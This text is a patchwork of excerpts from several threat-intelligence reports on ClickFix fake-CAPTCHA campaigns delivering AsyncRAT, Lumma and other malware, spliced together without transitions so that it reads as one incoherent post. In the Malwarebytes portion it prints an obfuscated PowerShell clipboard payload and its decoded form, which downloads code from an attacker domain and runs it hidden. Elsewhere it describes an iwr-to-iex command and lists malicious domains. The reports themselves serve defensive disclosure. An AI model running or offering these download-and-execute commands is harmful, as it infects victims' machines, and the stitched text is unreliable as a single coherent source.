Elastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware through social engineering tactics.
Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector. This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019 but now experiencing a significant surge in popularity.
This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malware it ultimately delivers.
Key takeaways
Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new.
Chapter 1: Captcha-verified Victim
This story starts with a message by one of my long time internet contacts:
Figure 1: Shit hit the Fan
I assume, some of you can already tell from this message alone that something terrible had just happend to him.
The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a Powershell command on device that does a Webrequest (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex” which stands for Invoke-Expression.
Thats a text-book example for a so called FakeCaptcha attack.
For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer:
A Captcha in itself is a legitimate method Website Owners use to differentiate between bots (automated traffic) and real human users. It often involves at-least clicking a button but can additionally require the website visitor to solve different form of small tasks like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the times.
We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.
The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.
Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.
fake Captcha
fake Captcha prompt
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.
Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.
instructions for the visitor
instructions to infect your own device
If you’re using Chrome, you may see this warning:
Chrome warns but for what?
Chrome issues a warning but it may the danger may be unclear to users
The warning is nice, but it’s not very clear what this warning is for, in my opinion.
Users of Malwarebytes’ Browser Guard will see this warning:
Browser Guard clipboard warning
Malwarebytes Browser Guard’s clipboard warning
“Hey, did you just copy something?
Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”
Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.
What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.
Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.
Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.
The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.
IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.
(booking.)chargesguestescenter[.]com
(booking.)badgustrewivers.com[.]com
(booking.)property-paids[.]com
(booking.)rewiewqproperty[.]com
(booking.)extranet-listing[.]com
(booking.)guestsalerts[.]com
(booking.)gustescharge[.]com
kvhandelregis[.]com
patheer-moreinfo[.]com
guestalerthelp[.]com
rewiewwselect[.]com
hekpaharma[.]com
bkngnet[.]com
partnervrft[.]com
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.
ClickFix is a social engineering tactic where fake verification systems or application errors are used to trick website visitors into running console commands that install malware.
These attacks have traditionally targeted Windows systems, prompting targets to execute PowerShell scripts from the Windows Run command, resulting in info-stealer malware infections and even ransomware.
However, a 2024 campaign using bogus Google Meet errors also targeted macOS users.
ClickFix targeting Linux users
A more recent campaign spotted by Hunt.io researchers last week is among the first to adapt this social engineering technique for Linux systems.
The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.
I've been following the development of Deno for some time. It kind of pushes all my buttons: a Rust-based Node alternative with an active web developer community?? Yes please.
As a developer, I've been looking for excuses to use Deno because, frankly, it's so much fun. It makes JavaScript/TypeScript enjoyable again by shipping sane defaults and making delightful choices about dependency management.
Deno also has some truly incredible features that go beyond the web development ecosystem. I want to focus on these features. I've wanted to explore Deno from an offensive security perspective for some time, but a new development in version 2.3 made this imperative: deno.exe—the standalone binary that constitutes the entire tool—is now code-signed on Windows.
Great news for Deno! But because of what Deno can do, it's also good news for those who would do nefarious things with it.
Code signing is a guarantee that the binary you got is the one you're supposed to have. It's supposed to be a higher level of trust than simply a hash checksum, since this is Microsoft telling you a trusted developer shipped this program.
It also means (for now), that Defender SmartScreen gives deno.exe a pass.
So what can Deno do for the red team and the ne'er-do-wells? I've put together a small sampling of demonstrations of Deno's capabilities.
I'm focusing somewhat on the "ClickFix" attack vector, since it is so prevalent at the time of writing, and apparently so effective. So with each of these, I want you to imagine some version of a user opening Win+R and pasting a short command in.
Over 100 auto dealerships were being abused compliments of a supply chain attack of a shared video service unique to dealerships. When active, the attack presented dealership visitors with a ClickFix webpage which led to a SectopRAT malware.
Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […]
Discover how the ClickFix social engineering attack exploits human psychology to bypass security. Learn how hackers use this tactic and how to protect against it.
ForitGuard Lab reveals a modified Havoc deployed by a ClickFix phishing campaign. The threat actor hides each stage behind SharePoint and also uses it as a C2.
Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.
Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, a part of ProepllerAds’ network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.